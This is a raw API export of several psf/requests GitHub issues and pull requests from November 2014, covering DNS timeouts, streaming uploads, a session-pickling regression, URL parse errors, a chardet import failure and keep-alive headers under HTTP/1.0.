{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2348/reactions" }
https://api.github.com/repos/psf/requests/issues/2348/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2348.diff", "html_url": "https://github.com/psf/requests/pull/2348", "merged_at": "2014-11-30T19:12:04Z", "patch_url": "https://github.com/psf/requests/pull/2348.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2348" }
true
[ "thanks!\n" ]
https://api.github.com/repos/psf/requests/issues/2347
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2347/labels{/name}
https://api.github.com/repos/psf/requests/issues/2347/comments
https://api.github.com/repos/psf/requests/issues/2347/events
https://github.com/psf/requests/issues/2347
49035544
MDU6SXNzdWU0OTAzNTU0NA==
2347
feature request: add a timeout to DNS lookups
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
[]
closed
true
null
[]
null
5
2014-11-17T04:24:41Z
2021-09-08T23:06:58Z
2014-11-17T05:45:05Z
CONTRIBUTOR
resolved
I don't think it's possible. But it would be nice. Currently if: 1. you set your DNS resolvers to something that's not listening on port 53, eg 123.123.123.123 2. you try to make a request with a timeout The request will use the system timeout, usually upwards of 2 minutes. It would be nice to be able to attach a timeout to DNS lookups. Go attaches one for example by resolving DNS in a goroutine with a thread timeout.
{ "avatar_url": "https://avatars.githubusercontent.com/u/234019?v=4", "events_url": "https://api.github.com/users/kevinburke/events{/privacy}", "followers_url": "https://api.github.com/users/kevinburke/followers", "following_url": "https://api.github.com/users/kevinburke/following{/other_user}", "gists_url": "https://api.github.com/users/kevinburke/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kevinburke", "id": 234019, "login": "kevinburke", "node_id": "MDQ6VXNlcjIzNDAxOQ==", "organizations_url": "https://api.github.com/users/kevinburke/orgs", "received_events_url": "https://api.github.com/users/kevinburke/received_events", "repos_url": "https://api.github.com/users/kevinburke/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kevinburke/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kevinburke/subscriptions", "type": "User", "url": "https://api.github.com/users/kevinburke", "user_view_type": "public" }
{ "+1": 1, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 1, "url": "https://api.github.com/repos/psf/requests/issues/2347/reactions" }
https://api.github.com/repos/psf/requests/issues/2347/timeline
null
completed
null
null
false
[ "in theory you could run the socket.connect() in a thread and time it out\n", "Given that requests doesn't handle sockets itself, I think this is a feature you should be requesting in urllib3. Before you open an issue there, I wonder if @shazow would care to express their opinion here first.\n", "I would love to have the ability to include a DNS timeout, but spawning a separate thread is not a viable option (for urllib3, at least).\n", "So something that should probably be pushed upstream to bugs.python.org as a feature request and will have to be a 3.5+ only feature. \n", "okay i submitted http://bugs.python.org/issue22889\n\n## \n\nKevin Burke\nphone: 925.271.7005 | twentymilliseconds.com\n\nOn Sun, Nov 16, 2014 at 9:19 PM, Ian Cordasco [email protected]\nwrote:\n\n> So something that should probably be pushed upstream to bugs.python.org\n> as a feature request and will have to be a 3.5+ only feature.\n> \n> —\n> Reply to this email directly or view it on GitHub\n> https://github.com/kennethreitz/requests/issues/2347#issuecomment-63261047\n> .\n" ]
https://api.github.com/repos/psf/requests/issues/2346
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2346/labels{/name}
https://api.github.com/repos/psf/requests/issues/2346/comments
https://api.github.com/repos/psf/requests/issues/2346/events
https://github.com/psf/requests/issues/2346
49,033,987
MDU6SXNzdWU0OTAzMzk4Nw==
2,346
Uploading Binary Files Without Reading Into RAM
{ "avatar_url": "https://avatars.githubusercontent.com/u/7476821?v=4", "events_url": "https://api.github.com/users/tuntapovski/events{/privacy}", "followers_url": "https://api.github.com/users/tuntapovski/followers", "following_url": "https://api.github.com/users/tuntapovski/following{/other_user}", "gists_url": "https://api.github.com/users/tuntapovski/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/tuntapovski", "id": 7476821, "login": "tuntapovski", "node_id": "MDQ6VXNlcjc0NzY4MjE=", "organizations_url": "https://api.github.com/users/tuntapovski/orgs", "received_events_url": "https://api.github.com/users/tuntapovski/received_events", "repos_url": "https://api.github.com/users/tuntapovski/repos", "site_admin": false, "starred_url": "https://api.github.com/users/tuntapovski/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/tuntapovski/subscriptions", "type": "User", "url": "https://api.github.com/users/tuntapovski", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-17T04:08:38Z
2021-09-08T23:06:58Z
2014-11-17T04:42:53Z
NONE
resolved
hi there. i try to upload a file via this: http://docs.python-requests.org/en/latest/user/advanced/#post-multiple-multipart-encoded-files but it does seem to read it into ram first. because i get memory errors on my low ram vps. it would be good if it would have worked like this: http://docs.python-requests.org/en/latest/user/advanced/#streaming-uploads my example code: import requests with open('example.rar', 'rb') as f: r = requests.post('https://anonfiles.com/api/v1/upload', files={'file' : f}) print r.text
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2346/reactions" }
https://api.github.com/repos/psf/requests/issues/2346/timeline
null
completed
null
null
false
[ "If you look at http://docs.python-requests.org/en/latest/user/quickstart/#post-a-multipart-encoded-file you'll see that we mention this limitation and recommend [requests-toolbelt](/sigmavirus24/requests-toolbelt). There's documentation on that project and it should be simple to use. Any problems encountered while using it should be filed against that project.\n", "oh sorry i'm blind. thnx for the support\nhave a nice day\n", "@daft117 Happy to help. \n" ]
https://api.github.com/repos/psf/requests/issues/2345
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2345/labels{/name}
https://api.github.com/repos/psf/requests/issues/2345/comments
https://api.github.com/repos/psf/requests/issues/2345/events
https://github.com/psf/requests/issues/2345
48,994,009
MDU6SXNzdWU0ODk5NDAwOQ==
2,345
Using RecentlyUsedContainer for session cache breaks pickling
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
[ { "color": "e10c02", "default": false, "description": null, "id": 117744, "name": "Bug", "node_id": "MDU6TGFiZWwxMTc3NDQ=", "url": "https://api.github.com/repos/psf/requests/labels/Bug" } ]
closed
true
null
[]
null
5
2014-11-16T15:52:15Z
2021-09-08T23:06:55Z
2014-11-30T19:12:43Z
CONTRIBUTOR
resolved
The changes in 387c8f8 have broken the ability to pickle a Session object. Possible solutions: - Re-implement `RecentlyUsedContainer` to not use threading locks - Do not attempt to pickle the session redirect cache (personally, I prefer this one) Reasons this wasn't caught earlier: - Jenkins has magically stopped working - No one has been running the suite locally before merging/approving changes
{ "avatar_url": "https://avatars.githubusercontent.com/u/119893?v=4", "events_url": "https://api.github.com/users/kennethreitz/events{/privacy}", "followers_url": "https://api.github.com/users/kennethreitz/followers", "following_url": "https://api.github.com/users/kennethreitz/following{/other_user}", "gists_url": "https://api.github.com/users/kennethreitz/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/kennethreitz", "id": 119893, "login": "kennethreitz", "node_id": "MDQ6VXNlcjExOTg5Mw==", "organizations_url": "https://api.github.com/users/kennethreitz/orgs", "received_events_url": "https://api.github.com/users/kennethreitz/received_events", "repos_url": "https://api.github.com/users/kennethreitz/repos", "site_admin": false, "starred_url": "https://api.github.com/users/kennethreitz/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/kennethreitz/subscriptions", "type": "User", "url": "https://api.github.com/users/kennethreitz", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2345/reactions" }
https://api.github.com/repos/psf/requests/issues/2345/timeline
null
completed
null
null
false
[ "Note to @kennethreitz, we **can not** do a release until we fix this.\n", "So we can't just remove `redirect_cache` from the list of `__attrs__`, it breaks the tests. So ... I'm thinking we have to special case how we serialize a `RecentlyUsedContainer`. We can call `dict` on the cache, but to repopulate it, we need to look over the items and then set them individually on the container which seems suboptimal. For now, we can do that until we maybe get something merged upstream in urllib3. The difficult thing is that the container is threadsafe, so I imagine an `update` method wouldn't be fit it well.\n", "oops. :(\n", "@mattrobenolt Not your fault, our CI was busted so you had no way to know. =)\n", "Also, we told you to take this approach. Not your fault in the slightest.\n" ]
https://api.github.com/repos/psf/requests/issues/2344
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2344/labels{/name}
https://api.github.com/repos/psf/requests/issues/2344/comments
https://api.github.com/repos/psf/requests/issues/2344/events
https://github.com/psf/requests/pull/2344
48,938,522
MDExOlB1bGxSZXF1ZXN0MjQ0OTY0MzQ=
2,344
Partially addresses Issue #1572
{ "avatar_url": "https://avatars.githubusercontent.com/u/7707694?v=4", "events_url": "https://api.github.com/users/ContinuousFunction/events{/privacy}", "followers_url": "https://api.github.com/users/ContinuousFunction/followers", "following_url": "https://api.github.com/users/ContinuousFunction/following{/other_user}", "gists_url": "https://api.github.com/users/ContinuousFunction/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ContinuousFunction", "id": 7707694, "login": "ContinuousFunction", "node_id": "MDQ6VXNlcjc3MDc2OTQ=", "organizations_url": "https://api.github.com/users/ContinuousFunction/orgs", "received_events_url": "https://api.github.com/users/ContinuousFunction/received_events", "repos_url": "https://api.github.com/users/ContinuousFunction/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ContinuousFunction/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ContinuousFunction/subscriptions", "type": "User", "url": "https://api.github.com/users/ContinuousFunction", "user_view_type": "public" }
[]
closed
true
null
[]
null
12
2014-11-16T00:59:29Z
2021-09-08T09:01:07Z
2014-12-17T04:49:50Z
CONTRIBUTOR
resolved
Addresses the LocationParseError but not the DecodeError from kennethreitz#1572. When running test_requests.py, I got an error in test_session_pickling which resulted in a TypeError. I'm not sure of the reason for the TypeError but I have commented out that test.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2344/reactions" }
https://api.github.com/repos/psf/requests/issues/2344/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2344.diff", "html_url": "https://github.com/psf/requests/pull/2344", "merged_at": "2014-12-17T04:49:50Z", "patch_url": "https://github.com/psf/requests/pull/2344.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2344" }
true
[ "Why have we commented out a test here?\n", "@Lukasa it's a test failure on master apparently. Besides that, I'm -1 on this. A `LocationParseError` happens long before a connection is even attempted. This should be an `InvalidURL` error\n", "Also the test failure was introduced sometime since 122c92e59002cad20c29be4e9ec9d4f6d50a1ef6\n", "Since it's complaining about Locks not being picklable, I suspect this has something to do with 387c8f8 since the `RecentlyUsedContainer` uses threading's locks. One solution is to not try to pickle the redirect cache. That said, this discussion belongs in its own issue.\n", "@sigmavirus24 If I've understood you correctly, I have changed the ConnectionError to an InvalidURL error.\n", "@ContinuousFunction could you amend your commit messages? Two commits in a row with the same message is incredibly unhelpful when looking at the log.\n", "@sigmavirus24 sorry about that. I've changed the message.\n", "@ContinuousFunction can you rebase this, uncomment the test that you commented, and ensure the tests pass. Then force-push to this same branch?\n", "@sigmavirus24 I believe I have made the appropriate changes.\n", "Thanks @ContinuousFunction I'll run these tests now and make sure they pass before merging.\n", "There was a test failure on Python 3 because `urllib3.exceptions.LocationParseError` doesn't have a `message` attribute. That's fixed in bd3cf95e34aa49c8d764c899672048df107e0d70.\n\nThanks @ContinuousFunction !\n", "@sigmavirus24 My pleasure!\n" ]
https://api.github.com/repos/psf/requests/issues/2343
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2343/labels{/name}
https://api.github.com/repos/psf/requests/issues/2343/comments
https://api.github.com/repos/psf/requests/issues/2343/events
https://github.com/psf/requests/pull/2343
48,936,444
MDExOlB1bGxSZXF1ZXN0MjQ0OTU1MDU=
2,343
Partially addresses Issue #1572
{ "avatar_url": "https://avatars.githubusercontent.com/u/7707694?v=4", "events_url": "https://api.github.com/users/ContinuousFunction/events{/privacy}", "followers_url": "https://api.github.com/users/ContinuousFunction/followers", "following_url": "https://api.github.com/users/ContinuousFunction/following{/other_user}", "gists_url": "https://api.github.com/users/ContinuousFunction/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ContinuousFunction", "id": 7707694, "login": "ContinuousFunction", "node_id": "MDQ6VXNlcjc3MDc2OTQ=", "organizations_url": "https://api.github.com/users/ContinuousFunction/orgs", "received_events_url": "https://api.github.com/users/ContinuousFunction/received_events", "repos_url": "https://api.github.com/users/ContinuousFunction/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ContinuousFunction/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ContinuousFunction/subscriptions", "type": "User", "url": "https://api.github.com/users/ContinuousFunction", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-15T23:23:58Z
2021-09-08T09:01:14Z
2014-11-15T23:56:42Z
CONTRIBUTOR
resolved
Addresses the LocationParseError but not the DecodeError from kennethreitz#1572. When running test_requests.py, I got an error in test_session_pickling which resulted in a TypeError. I'm not sure of the reason for the TypeError but I have commented out that test.
{ "avatar_url": "https://avatars.githubusercontent.com/u/7707694?v=4", "events_url": "https://api.github.com/users/ContinuousFunction/events{/privacy}", "followers_url": "https://api.github.com/users/ContinuousFunction/followers", "following_url": "https://api.github.com/users/ContinuousFunction/following{/other_user}", "gists_url": "https://api.github.com/users/ContinuousFunction/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ContinuousFunction", "id": 7707694, "login": "ContinuousFunction", "node_id": "MDQ6VXNlcjc3MDc2OTQ=", "organizations_url": "https://api.github.com/users/ContinuousFunction/orgs", "received_events_url": "https://api.github.com/users/ContinuousFunction/received_events", "repos_url": "https://api.github.com/users/ContinuousFunction/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ContinuousFunction/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ContinuousFunction/subscriptions", "type": "User", "url": "https://api.github.com/users/ContinuousFunction", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2343/reactions" }
https://api.github.com/repos/psf/requests/issues/2343/timeline
null
null
false
{ "diff_url": "https://github.com/psf/requests/pull/2343.diff", "html_url": "https://github.com/psf/requests/pull/2343", "merged_at": null, "patch_url": "https://github.com/psf/requests/pull/2343.patch", "url": "https://api.github.com/repos/psf/requests/pulls/2343" }
true
[ "My branch is 96 commits ahead and 142 commits behind. Will close until I figure out the problem.\n" ]
https://api.github.com/repos/psf/requests/issues/2342
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2342/labels{/name}
https://api.github.com/repos/psf/requests/issues/2342/comments
https://api.github.com/repos/psf/requests/issues/2342/events
https://github.com/psf/requests/issues/2342
48,837,799
MDU6SXNzdWU0ODgzNzc5OQ==
2,342
chardet ImportError: cannot import name universaldetector
{ "avatar_url": "https://avatars.githubusercontent.com/u/9618138?v=4", "events_url": "https://api.github.com/users/ivankoster/events{/privacy}", "followers_url": "https://api.github.com/users/ivankoster/followers", "following_url": "https://api.github.com/users/ivankoster/following{/other_user}", "gists_url": "https://api.github.com/users/ivankoster/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ivankoster", "id": 9618138, "login": "ivankoster", "node_id": "MDQ6VXNlcjk2MTgxMzg=", "organizations_url": "https://api.github.com/users/ivankoster/orgs", "received_events_url": "https://api.github.com/users/ivankoster/received_events", "repos_url": "https://api.github.com/users/ivankoster/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ivankoster/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ivankoster/subscriptions", "type": "User", "url": "https://api.github.com/users/ivankoster", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-14T20:46:58Z
2021-09-08T23:06:59Z
2014-11-14T21:28:32Z
NONE
resolved
Hello, When I try to retrieve the text attribute from a request, i get the following error: Traceback (most recent call last): File ".\sublime_plugin.py", line 175, in on_load File ".\sublime_plugin.py", line 154, in run_timed_function File ".\sublime_plugin.py", line 174, in <lambda> File ".\SublimeYouCompleteMe.py", line 244, in on_load File ".\plugin\ycmd_request.py", line 136, in send File ".\plugin\ycmd_request.py", line 43, in post_data_to_handler File ".\plugin\ycmd_request.py", line 109, in json_from_response File ".\requests\models.py", line 756, in text encoding = self.apparent_encoding File ".\requests\models.py", line 637, in apparent_encoding return chardet.detect(self.content)['encoding'] File ".\requests\packages\chardet\detect.py", line 11, in detect ImportError: cannot import name universaldetector On python 2.7.8 I think this is an error in chardet's detect function in **init**.py, which does an import on function level instead of module level. The import is "from . import universaldetector" and since it is called from requests/models.py it searches in the requests folder for universaldetector, which obviously fails. I confirmed this by changing the line to "from packages.chardet import universaldetector" which hilariously solves the problem. But I wonder if this bug is down to my specific configuration, because it seems like a bug that would affect a lot of people?
{ "avatar_url": "https://avatars.githubusercontent.com/u/9618138?v=4", "events_url": "https://api.github.com/users/ivankoster/events{/privacy}", "followers_url": "https://api.github.com/users/ivankoster/followers", "following_url": "https://api.github.com/users/ivankoster/following{/other_user}", "gists_url": "https://api.github.com/users/ivankoster/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/ivankoster", "id": 9618138, "login": "ivankoster", "node_id": "MDQ6VXNlcjk2MTgxMzg=", "organizations_url": "https://api.github.com/users/ivankoster/orgs", "received_events_url": "https://api.github.com/users/ivankoster/received_events", "repos_url": "https://api.github.com/users/ivankoster/repos", "site_admin": false, "starred_url": "https://api.github.com/users/ivankoster/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/ivankoster/subscriptions", "type": "User", "url": "https://api.github.com/users/ivankoster", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2342/reactions" }
https://api.github.com/repos/psf/requests/issues/2342/timeline
null
completed
null
null
false
[ "This is simply because you're using requests inside a sublime package and sublime has it's own weird Python that it ships with (if I remember correctly).\n", "Ah thanks for the insight.\nI expected something like that, because it would affect too many people otherwise.\nI do know the encoding beforehand so I've used that to avoid importing the chardet module.\nThanks again!\n", "No worries @ivankoster \n" ]
https://api.github.com/repos/psf/requests/issues/2341
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2341/labels{/name}
https://api.github.com/repos/psf/requests/issues/2341/comments
https://api.github.com/repos/psf/requests/issues/2341/events
https://github.com/psf/requests/issues/2341
48,812,889
MDU6SXNzdWU0ODgxMjg4OQ==
2,341
"keep-alive" over a HTTP/1.0 request issue
{ "avatar_url": "https://avatars.githubusercontent.com/u/642052?v=4", "events_url": "https://api.github.com/users/laurento/events{/privacy}", "followers_url": "https://api.github.com/users/laurento/followers", "following_url": "https://api.github.com/users/laurento/following{/other_user}", "gists_url": "https://api.github.com/users/laurento/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/laurento", "id": 642052, "login": "laurento", "node_id": "MDQ6VXNlcjY0MjA1Mg==", "organizations_url": "https://api.github.com/users/laurento/orgs", "received_events_url": "https://api.github.com/users/laurento/received_events", "repos_url": "https://api.github.com/users/laurento/repos", "site_admin": false, "starred_url": "https://api.github.com/users/laurento/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/laurento/subscriptions", "type": "User", "url": "https://api.github.com/users/laurento", "user_view_type": "public" }
[]
closed
true
null
[]
null
1
2014-11-14T17:00:38Z
2021-09-08T23:06:58Z
2014-11-15T14:27:36Z
NONE
resolved
Debugging a nasty "300: Bad request" error I noticed an invalid behaviour when requests-2.4 is used in combination with HTTP/1.0. Tring to reproduce the issue this is what I found... ``` python import httplib import requests # Workaround for the IncompleteRead issue. # See http://bugs.python.org/issue14044 httplib.HTTPConnection._http_vsn = 10 httplib.HTTPConnection._http_vsn_str = 'HTTP/1.0' r = requests.get('https://www.google.com') r.request.headers ``` On requests-2.4.3 (from PyPi) the request headers are ``` python {'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.4.3 CPython/2.7.8 Linux/3.16.0-24-generic'} ``` On requests-2.3.0 (Ubuntu 14.10 official repos) the request headers are (notice no keep-alive here) ``` python {'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.3.0 CPython/2.7.8 Linux/3.16.0-24-generic'} ``` Reading the documentation I guess HTTP/1.0 is not supported by the requests library but I'd like to suggest at least a nice WARN log message to inform the result can be weird. Some setups don't seem to like the _invalid_ combination "keep-alive" in the headers and HTTP/1.0 and even if in most cases everything is working fine at least once I received a "300: Bad request" error.
{ "avatar_url": "https://avatars.githubusercontent.com/u/240830?v=4", "events_url": "https://api.github.com/users/sigmavirus24/events{/privacy}", "followers_url": "https://api.github.com/users/sigmavirus24/followers", "following_url": "https://api.github.com/users/sigmavirus24/following{/other_user}", "gists_url": "https://api.github.com/users/sigmavirus24/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/sigmavirus24", "id": 240830, "login": "sigmavirus24", "node_id": "MDQ6VXNlcjI0MDgzMA==", "organizations_url": "https://api.github.com/users/sigmavirus24/orgs", "received_events_url": "https://api.github.com/users/sigmavirus24/received_events", "repos_url": "https://api.github.com/users/sigmavirus24/repos", "site_admin": false, "starred_url": "https://api.github.com/users/sigmavirus24/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/sigmavirus24/subscriptions", "type": "User", "url": "https://api.github.com/users/sigmavirus24", "user_view_type": "public" }
{ "+1": 0, "-1": 0, "confused": 0, "eyes": 0, "heart": 0, "hooray": 0, "laugh": 0, "rocket": 0, "total_count": 0, "url": "https://api.github.com/repos/psf/requests/issues/2341/reactions" }
https://api.github.com/repos/psf/requests/issues/2341/timeline
null
completed
null
null
false
[ "Sorry, this is a bit unclear to me. Are you explicitly setting the version string on all `HTTPConnection`s? You can override the `Connection: keep-alive` header, like so\n\n``` pycon\nPython 2.7.8 (default, Oct 19 2014, 16:03:53)\n[GCC 4.2.1 Compatible Apple LLVM 6.0 (clang-600.0.51)] on darwin\nType \"help\", \"copyright\", \"credits\" or \"license\" for more information.\n>>> import requests\n>>> requests.__version__\n'2.4.1'\n>>> r = requests.get('https://httpbin.org/get', headers={'Connection': None})\n>>> r.request.headers\n{'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.4.1 CPython/2.7.8 Darwin/14.0.0'}\n```\n\nIf you use a session you can do:\n\n``` pycon\n>>> s = requests.Session()\n>>> s\n<requests.sessions.Session object at 0x10e569dd0>\n>>> s.headers\n{'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.4.1 CPython/2.7.8 Darwin/14.0.0'}\n>>> del s.headers['Connection']\n>>> r2 = s.get('https://httpbin.org/get')\n>>> r2.request.headers\n{'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.4.1 CPython/2.7.8 Darwin/14.0.0'}\n```\n\nTechnically we were supposed to be sending this header since 1.0 (and we were at some point) so this isn't something we should need to warn most users about. We also don't introspect httplib at any point to determine if you've overridden any of the values because 99% of our users don't do that. And if they do, they know that if they get unexpected results it isn't our fault for expecting something different.\n" ]
https://api.github.com/repos/psf/requests/issues/2340
https://api.github.com/repos/psf/requests
https://api.github.com/repos/psf/requests/issues/2340/labels{/name}
https://api.github.com/repos/psf/requests/issues/2340/comments
https://api.github.com/repos/psf/requests/issues/2340/events
https://github.com/psf/requests/issues/2340
48,777,189
MDU6SXNzdWU0ODc3NzE4OQ==
2,340
ImportError: cannot import name 'certs'
{ "avatar_url": "https://avatars.githubusercontent.com/u/7079544?v=4", "events_url": "https://api.github.com/users/davyria/events{/privacy}", "followers_url": "https://api.github.com/users/davyria/followers", "following_url": "https://api.github.com/users/davyria/following{/other_user}", "gists_url": "https://api.github.com/users/davyria/gists{/gist_id}", "gravatar_id": "", "html_url": "https://github.com/davyria", "id": 7079544, "login": "davyria", "node_id": "MDQ6VXNlcjcwNzk1NDQ=", "organizations_url": "https://api.github.com/users/davyria/orgs", "received_events_url": "https://api.github.com/users/davyria/received_events", "repos_url": "https://api.github.com/users/davyria/repos", "site_admin": false, "starred_url": "https://api.github.com/users/davyria/starred{/owner}{/repo}", "subscriptions_url": "https://api.github.com/users/davyria/subscriptions", "type": "User", "url": "https://api.github.com/users/davyria", "user_view_type": "public" }
[]
closed
true
null
[]
null
3
2014-11-14T11:41:59Z
2021-09-08T23:06:57Z
2014-11-15T14:20:41Z
NONE
resolved
